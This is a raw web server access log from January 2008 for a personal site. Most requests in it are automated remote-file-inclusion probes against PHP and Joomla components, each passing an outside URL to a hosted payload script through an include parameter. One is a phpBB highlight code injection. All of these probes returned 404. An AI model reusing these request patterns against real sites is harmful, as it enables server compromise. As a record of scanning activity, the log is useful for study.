80.190.144.116 - - [15/Jan/2008:18:18:44 -0800] "GET /logs//viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://dj4you.ch/vsd/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.1; Windows NT 5.1;)" "www.dmulk.com"
62.4.95.20 - - [15/Jan/2008:18:18:49 -0800] "GET /logs/access_071228.log//multithumb/multithumb?mosConfig_absolute_path=http://party4you.ch/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.4.95.20 - - [15/Jan/2008:18:18:50 -0800] "GET //multithumb/multithumb?mosConfig_absolute_path=http://party4you.ch/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.4.95.20 - - [15/Jan/2008:18:18:50 -0800] "GET /logs//multithumb/multithumb?mosConfig_absolute_path=http://party4you.ch/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
202.67.153.114 - - [15/Jan/2008:18:18:51 -0800] "GET //templates/mangobery/footer.sample.php?Site_Path=http://rltrac.com/newsletter/wp-content/themes/themesID?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
202.67.153.114 - - [15/Jan/2008:18:18:51 -0800] "GET //templates/mangobery/footer.sample.php?Site_Path=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
212.241.168.186 - - [15/Jan/2008:18:18:56 -0800] "GET /logs/access_071228.log//multithumb/multithumb?mosConfig_absolute_path=http://party4you.ch/new/id.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
212.241.168.186 - - [15/Jan/2008:18:18:56 -0800] "GET //multithumb/multithumb?mosConfig_absolute_path=http://party4you.ch/new/id.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
212.241.168.186 - - [15/Jan/2008:18:18:56 -0800] "GET /logs//multithumb/multithumb?mosConfig_absolute_path=http://party4you.ch/new/id.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
193.111.201.15 - - [15/Jan/2008:18:18:58 -0800] "GET /logs/access_071225.log//multithumb/multithumb?mosConfig_absolute_path=http://party4you.ch/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
80.89.232.80 - - [15/Jan/2008:18:19:11 -0800] "GET /logs/access_071225.log//multithumb/multithumb?mosConfig_absolute_path=http://party4you.ch/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
62.148.173.160 - - [15/Jan/2008:18:19:18 -0800] "GET /logs/access_071225.log//multithumb/multithumb?mosConfig_absolute_path=http://party4you.ch/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
212.241.168.186 - - [15/Jan/2008:18:19:36 -0800] "GET /logs/access_071225.log//multithumb/multithumb?mosConfig_absolute_path=http://party4you.ch/new/id.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.4.95.20 - - [15/Jan/2008:18:19:36 -0800] "GET /logs/access_071225.log//multithumb/multithumb?mosConfig_absolute_path=http://party4you.ch/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
195.5.116.12 - - [15/Jan/2008:18:20:16 -0800] "GET /logs/access_071228.log//multithumb/multithumb?mosConfig_absolute_path=http://party4you.ch/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.5.116.12 - - [15/Jan/2008:18:20:16 -0800] "GET //multithumb/multithumb?mosConfig_absolute_path=http://party4you.ch/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.5.116.12 - - [15/Jan/2008:18:20:16 -0800] "GET /logs//multithumb/multithumb?mosConfig_absolute_path=http://party4you.ch/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.30.216.109 - - [15/Jan/2008:18:20:37 -0800] "GET /logs/access_071229.log HTTP/1.0" 200 314379 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
195.5.116.12 - - [15/Jan/2008:18:21:30 -0800] "GET /logs/access_071225.log//multithumb/multithumb?mosConfig_absolute_path=http://party4you.ch/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
82.160.31.2 - - [15/Jan/2008:18:24:10 -0800] "GET /logs/access_071225.log//multithumb/multithumb?mosConfig_absolute_path=http://party4you.ch/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
82.160.31.2 - - [15/Jan/2008:18:24:10 -0800] "GET //multithumb/multithumb?mosConfig_absolute_path=http://party4you.ch/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
82.160.31.2 - - [15/Jan/2008:18:24:11 -0800] "GET /logs//multithumb/multithumb?mosConfig_absolute_path=http://party4you.ch/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
82.160.31.2 - - [15/Jan/2008:18:25:50 -0800] "GET /logs/access_071228.log//multithumb/multithumb?mosConfig_absolute_path=http://party4you.ch/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
80.190.144.116 - - [15/Jan/2008:18:25:55 -0800] "GET /administrator/components/com_trade/includes/trade/tradetop.php?mosConfig_absolute_path=http://dj4you.ch/vsd/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.1; Windows NT 5.1;)" "www.dmulk.com"
80.190.144.116 - - [15/Jan/2008:18:25:55 -0800] "GET /logs/administrator/components/com_trade/includes/trade/tradetop.php?mosConfig_absolute_path=http://dj4you.ch/vsd/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.1; Windows NT 5.1;)" "www.dmulk.com"
66.11.230.30 - - [15/Jan/2008:18:26:58 -0800] "GET /logs/access_071228.log/modules/4nAlbum/public/displayCategory.php?basepath=http://claroline.lct-net.cl/id?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
72.36.168.242 - - [15/Jan/2008:18:30:21 -0800] "GET /logs/access_071229.log//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://h1.ripway.com/tunkzilla007/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.36.168.242 - - [15/Jan/2008:18:30:21 -0800] "GET //modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://h1.ripway.com/tunkzilla007/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.36.168.242 - - [15/Jan/2008:18:30:21 -0800] "GET /logs//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://h1.ripway.com/tunkzilla007/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.6.26.160 - - [15/Jan/2008:18:34:30 -0800] "GET /mobileoffice/ HTTP/1.0" 200 5008 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
74.52.170.162 - - [15/Jan/2008:18:36:19 -0800] "GET /comments-display-tpl.php?language_file=http://claroline.lct-net.cl/www????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
67.19.126.106 - - [15/Jan/2008:18:36:42 -0800] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://forum.juggla.net/images/avatars/.as./figo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
205.234.252.231 - - [15/Jan/2008:18:36:56 -0800] "GET /logs/access_071229.log//////////modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=uid=99(nobody)%20gid=99(nobody)%20groups=99(nobody)%0A? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
205.234.252.231 - - [15/Jan/2008:18:36:56 -0800] "GET //////////modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=uid=99(nobody)%20gid=99(nobody)%20groups=99(nobody)%0A? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
205.234.252.231 - - [15/Jan/2008:18:36:56 -0800] "GET /logs//////////modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=uid=99(nobody)%20gid=99(nobody)%20groups=99(nobody)%0A? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
205.234.252.231 - - [15/Jan/2008:18:37:02 -0800] "GET /logs/access.log//////////modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=uid=99(nobody)%20gid=99(nobody)%20groups=99(nobody)%0A? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.10.144.175 - - [15/Jan/2008:18:39:20 -0800] "GET /index.php?body=http://www.psicosalute.it/modules/xt_conteudo_copia/images/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
213.239.146.66 - - [15/Jan/2008:18:40:34 -0800] "GET /logs/administrator/components/com_webring/admin.webring.docs.php?component_dir=http://party4you.ch/new/test.txt??? HTTP/1.1" 404 275 "-" "Advanced Browser (http://www.avantbrowser.com)" "www.dmulk.com"
213.239.146.66 - - [15/Jan/2008:18:40:34 -0800] "GET /administrator/components/com_webring/admin.webring.docs.php?component_dir=http://party4you.ch/new/test.txt??? HTTP/1.1" 404 275 "-" "Advanced Browser (http://www.avantbrowser.com)" "www.dmulk.com"
213.239.146.66 - - [15/Jan/2008:18:40:44 -0800] "GET /administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://party4you.ch/new/test.txt??? HTTP/1.1" 404 275 "-" "Advanced Browser (http://www.avantbrowser.com)" "www.dmulk.com"
213.239.146.66 - - [15/Jan/2008:18:40:45 -0800] "GET /logs/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://party4you.ch/new/test.txt??? HTTP/1.1" 404 275 "-" "Advanced Browser (http://www.avantbrowser.com)" "www.dmulk.com"
85.131.186.6 - - [15/Jan/2008:18:40:47 -0800] "GET /administrator/components/com_trade/includes/trade/tradetop.php?mosConfig_absolute_path=http://dj4you.ch/vsd/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/1.22 (compatible; MSIE 1.5; Windows NT)" "www.dmulk.com"
85.131.186.6 - - [15/Jan/2008:18:40:49 -0800] "GET /logs/administrator/components/com_trade/includes/trade/tradetop.php?mosConfig_absolute_path=http://dj4you.ch/vsd/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/1.22 (compatible; MSIE 1.5; Windows NT)" "www.dmulk.com"
74.52.170.162 - - [15/Jan/2008:18:42:28 -0800] "GET /logs/access_071219.log/comments-display-tpl.php?language_file=http://claroline.lct-net.cl/www????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.52.170.162 - - [15/Jan/2008:18:42:30 -0800] "GET /logs/comments-display-tpl.php?language_file=http://claroline.lct-net.cl/www????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
206.220.64.3 - - [15/Jan/2008:18:42:43 -0800] "GET /logs/access_071225.log//modules/TotalCalendar/about.php?inc_dir=http://www.italianviper.altervista.org/php/php4/com.txt????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
206.220.64.3 - - [15/Jan/2008:18:42:43 -0800] "GET //modules/TotalCalendar/about.php?inc_dir=http://www.italianviper.altervista.org/php/php4/com.txt????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
206.220.64.3 - - [15/Jan/2008:18:42:43 -0800] "GET /logs//modules/TotalCalendar/about.php?inc_dir=http://www.italianviper.altervista.org/php/php4/com.txt????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.114.133.27 - - [15/Jan/2008:18:43:25 -0800] "GET /logs/access_071225.log//modules/TotalCalendar/about.php?inc_dir=http://www.italianviper.altervista.org/php/php4/com.txt????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.114.133.27 - - [15/Jan/2008:18:43:26 -0800] "GET //modules/TotalCalendar/about.php?inc_dir=http://www.italianviper.altervista.org/php/php4/com.txt????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.114.133.27 - - [15/Jan/2008:18:43:26 -0800] "GET /logs//modules/TotalCalendar/about.php?inc_dir=http://www.italianviper.altervista.org/php/php4/com.txt????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.52.170.162 - - [15/Jan/2008:18:43:46 -0800] "GET /logs/access_071216.log/comments-display-tpl.php?language_file=http://claroline.lct-net.cl/www????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
213.239.146.66 - - [15/Jan/2008:18:47:35 -0800] "GET /admin/editor2/spaw_control.class.php?spaw_root=http://party4you.ch/new/test.txt??? HTTP/1.1" 404 275 "-" "Advanced Browser (http://www.avantbrowser.com)" "www.dmulk.com"
213.239.146.66 - - [15/Jan/2008:18:47:36 -0800] "GET /logs/admin/editor2/spaw_control.class.php?spaw_root=http://party4you.ch/new/test.txt??? HTTP/1.1" 404 275 "-" "Advanced Browser (http://www.avantbrowser.com)" "www.dmulk.com"
193.242.108.82 - - [15/Jan/2008:18:49:20 -0800] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.buyphpscripts.com/x.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.dmulk.com"
193.242.108.82 - - [15/Jan/2008:18:49:21 -0800] "GET /logs/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.buyphpscripts.com/x.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.dmulk.com"
66.215.69.71 - - [15/Jan/2008:18:49:32 -0800] "GET /bikes/dteel/15JAN08/20080115_0002M.JPG HTTP/1.1" 200 67485 "http://www.st-owners.com/forums/showthread.php?t=30553&page=7" "Opera/9.25 (Windows NT 5.1; U; en)" "www.dmulk.com"
211.141.73.133 - - [15/Jan/2008:18:53:34 -0800] "GET /logs/access.log/modules/My_eGallery/index.php?basepath=http://190.8.128.58/.../test.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
211.141.73.133 - - [15/Jan/2008:18:53:35 -0800] "GET /logs/access.log/modules/My_eGallery/index.php?basepath=http://190.8.128.58/.../test.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
211.141.73.133 - - [15/Jan/2008:18:53:39 -0800] "GET /modules/My_eGallery/index.php?basepath=http://190.8.128.58/.../test.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
211.141.73.133 - - [15/Jan/2008:18:53:42 -0800] "GET /modules/My_eGallery/index.php?basepath=http://190.8.128.58/.../test.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
211.141.73.133 - - [15/Jan/2008:18:53:45 -0800] "GET /logs/modules/My_eGallery/index.php?basepath=http://190.8.128.58/.../test.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
211.141.73.133 - - [15/Jan/2008:18:53:48 -0800] "GET /logs/modules/My_eGallery/index.php?basepath=http://190.8.128.58/.../test.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
211.141.73.133 - - [15/Jan/2008:18:53:52 -0800] "GET /modules/My_eGallery/index.php?basepath=http://190.8.128.58/.../test.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
211.141.73.133 - - [15/Jan/2008:18:54:05 -0800] "GET /logs/modules/My_eGallery/index.php?basepath=http://190.8.128.58/.../test.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
85.114.133.27 - - [15/Jan/2008:18:54:19 -0800] "GET /logs/access_071229.log//modules/vwar/admin/admin.php?vwar_root=http://www.italianviper.altervista.org/php/php4/com.txt????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.114.133.27 - - [15/Jan/2008:18:54:20 -0800] "GET //modules/vwar/admin/admin.php?vwar_root=http://www.italianviper.altervista.org/php/php4/com.txt????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.114.133.27 - - [15/Jan/2008:18:54:20 -0800] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://www.italianviper.altervista.org/php/php4/com.txt????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.52.170.162 - - [15/Jan/2008:18:55:51 -0800] "GET /convert/mvcw.php?vwar_root=http://claroline.lct-net.cl/www????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
217.220.212.155 - - [15/Jan/2008:18:56:34 -0800] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://forum.juggla.net/images/avatars/.as./figo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
68.35.47.245 - - [15/Jan/2008:19:04:51 -0800] "GET /bikes/dteel/15JAN08/20080115_0002M.JPG HTTP/1.1" 200 67485 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322)" "www.dmulk.com"
202.180.216.12 - - [15/Jan/2008:19:05:14 -0800] "GET /logs/access_071210.log///administrator/components/com_wmtportfolio/admin.wmtportfolio.php?mosConfig_absolute_path=http://www.sajin88.com/bbs/paddy/djd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
202.180.216.12 - - [15/Jan/2008:19:05:15 -0800] "GET ///administrator/components/com_wmtportfolio/admin.wmtportfolio.php?mosConfig_absolute_path=http://www.sajin88.com/bbs/paddy/djd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
202.180.216.12 - - [15/Jan/2008:19:05:15 -0800] "GET /logs///administrator/components/com_wmtportfolio/admin.wmtportfolio.php?mosConfig_absolute_path=http://www.sajin88.com/bbs/paddy/djd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
205.234.252.231 - - [15/Jan/2008:19:09:10 -0800] "GET /logs/access_071229.log//////////components/com_simpleboard/image_upload.php?sbp=uid=99(nobody)%20gid=99(nobody)%20groups=99(nobody)%0A? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
205.234.252.231 - - [15/Jan/2008:19:09:10 -0800] "GET //////////components/com_simpleboard/image_upload.php?sbp=uid=99(nobody)%20gid=99(nobody)%20groups=99(nobody)%0A? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
205.234.252.231 - - [15/Jan/2008:19:09:10 -0800] "GET /logs//////////components/com_simpleboard/image_upload.php?sbp=uid=99(nobody)%20gid=99(nobody)%20groups=99(nobody)%0A? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
87.117.233.130 - - [15/Jan/2008:19:09:24 -0800] "GET /skins/advanced/advanced1.php?pluginpath[0]=http://www.buyphpscripts.com/x.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6" "www.dmulk.com"
87.117.233.130 - - [15/Jan/2008:19:09:24 -0800] "GET /logs/skins/advanced/advanced1.php?pluginpath[0]=http://www.buyphpscripts.com/x.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6" "www.dmulk.com"
87.117.233.130 - - [15/Jan/2008:19:09:35 -0800] "GET /phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://www.buyphpscripts.com/x.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6" "www.dmulk.com"
87.117.233.130 - - [15/Jan/2008:19:09:35 -0800] "GET /logs/phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://www.buyphpscripts.com/x.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6" "www.dmulk.com"
67.19.126.106 - - [15/Jan/2008:19:10:22 -0800] "GET /logs/access.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://forum.juggla.net/images/avatars/.as./figo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
67.19.126.106 - - [15/Jan/2008:19:10:22 -0800] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://forum.juggla.net/images/avatars/.as./figo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
67.19.126.106 - - [15/Jan/2008:19:10:23 -0800] "GET /logs/access_071229.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://forum.juggla.net/images/avatars/.as./figo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
24.175.71.74 - - [15/Jan/2008:19:11:36 -0800] "GET /bikes/dteel/15JAN08/20080115_0002M.JPG HTTP/1.1" 200 67485 "http://www.st-owners.com/forums/showthread.php?t=30553&page=7" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648)" "www.dmulk.com"
206.220.64.3 - - [15/Jan/2008:19:13:17 -0800] "GET /logs/access_071229.log//modules/vwar/admin/admin.php?vwar_root=http://www.italianviper.altervista.org/php/php4/com.txt????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
206.220.64.3 - - [15/Jan/2008:19:13:17 -0800] "GET //modules/vwar/admin/admin.php?vwar_root=http://www.italianviper.altervista.org/php/php4/com.txt????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
206.220.64.3 - - [15/Jan/2008:19:13:17 -0800] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://www.italianviper.altervista.org/php/php4/com.txt????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.131.186.6 - - [15/Jan/2008:19:13:30 -0800] "GET //viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://dj4you.ch/vsd/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/1.22 (compatible; MSIE 1.5; Windows NT)" "www.dmulk.com"
85.131.186.6 - - [15/Jan/2008:19:13:34 -0800] "GET /logs//viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://dj4you.ch/vsd/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/1.22 (compatible; MSIE 1.5; Windows NT)" "www.dmulk.com"
205.234.252.231 - - [15/Jan/2008:19:15:37 -0800] "GET /logs/access_071229.log//////////modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=uid=99(nobody)%20gid=99(nobody)%20groups=99(nobody)%0A? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
205.234.252.231 - - [15/Jan/2008:19:15:37 -0800] "GET //////////modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=uid=99(nobody)%20gid=99(nobody)%20groups=99(nobody)%0A? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
205.234.252.231 - - [15/Jan/2008:19:15:38 -0800] "GET /logs//////////modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=uid=99(nobody)%20gid=99(nobody)%20groups=99(nobody)%0A? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.75.35.118 - - [15/Jan/2008:19:15:42 -0800] "GET /logs/access.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://zal.sioru.net/KOMA/id?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
216.75.35.118 - - [15/Jan/2008:19:15:42 -0800] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://zal.sioru.net/KOMA/id?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
216.75.35.118 - - [15/Jan/2008:19:15:42 -0800] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://zal.sioru.net/KOMA/id?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
216.75.35.118 - - [15/Jan/2008:19:15:42 -0800] "GET /logs/access_071229.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://zal.sioru.net/KOMA/id?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.6.22.126 - - [15/Jan/2008:19:15:57 -0800] "GET / HTTP/1.0" 200 2946 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
202.180.216.12 - - [15/Jan/2008:19:16:33 -0800] "GET /logs/access_071220.log///administrator/components/com_wmtportfolio/admin.wmtportfolio.php?mosConfig_absolute_path=http://www.sajin88.com/bbs/paddy/djd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
209.85.29.25 - - [15/Jan/2008:19:17:32 -0800] "GET /logs/show.php?x=http://party4you.ch/new/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.23; Mac_PowerPC)" "www.dmulk.com"
72.222.174.45 - - [15/Jan/2008:19:19:53 -0800] "GET /bikes/dteel/15JAN08/20080115_0002M.JPG HTTP/1.1" 200 67485 "http://www.st-owners.com/forums/showthread.php?t=30553&page=7" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322)" "www.dmulk.com"
80.13.23.102 - - [15/Jan/2008:19:21:15 -0800] "GET /logs/access.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://bazar.lancut.org/id1.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
80.13.23.102 - - [15/Jan/2008:19:21:16 -0800] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://bazar.lancut.org/id1.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
80.13.23.102 - - [15/Jan/2008:19:21:16 -0800] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://bazar.lancut.org/id1.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.6.19.110 - - [15/Jan/2008:19:23:17 -0800] "GET /robots.txt HTTP/1.0" 404 275 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
74.6.28.233 - - [15/Jan/2008:19:23:17 -0800] "GET /presto/?N=D HTTP/1.0" 200 510 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
217.220.212.155 - - [15/Jan/2008:19:23:50 -0800] "GET /logs/access.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://forum.juggla.net/images/avatars/.as./figo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.220.212.155 - - [15/Jan/2008:19:23:51 -0800] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://forum.juggla.net/images/avatars/.as./figo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.52.170.162 - - [15/Jan/2008:19:24:07 -0800] "GET /logs/access_071221.log/convert/mvcw.php?vwar_root=http://claroline.lct-net.cl/www????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.52.170.162 - - [15/Jan/2008:19:24:09 -0800] "GET /logs/convert/mvcw.php?vwar_root=http://claroline.lct-net.cl/www????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.160.107.168 - - [15/Jan/2008:19:25:13 -0800] "GET /bikes/dteel/15JAN08/20080115_0002M.JPG HTTP/1.1" 200 67485 "http://www.st-owners.com/forums/showthread.php?t=30553&page=7" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322)" "www.dmulk.com"
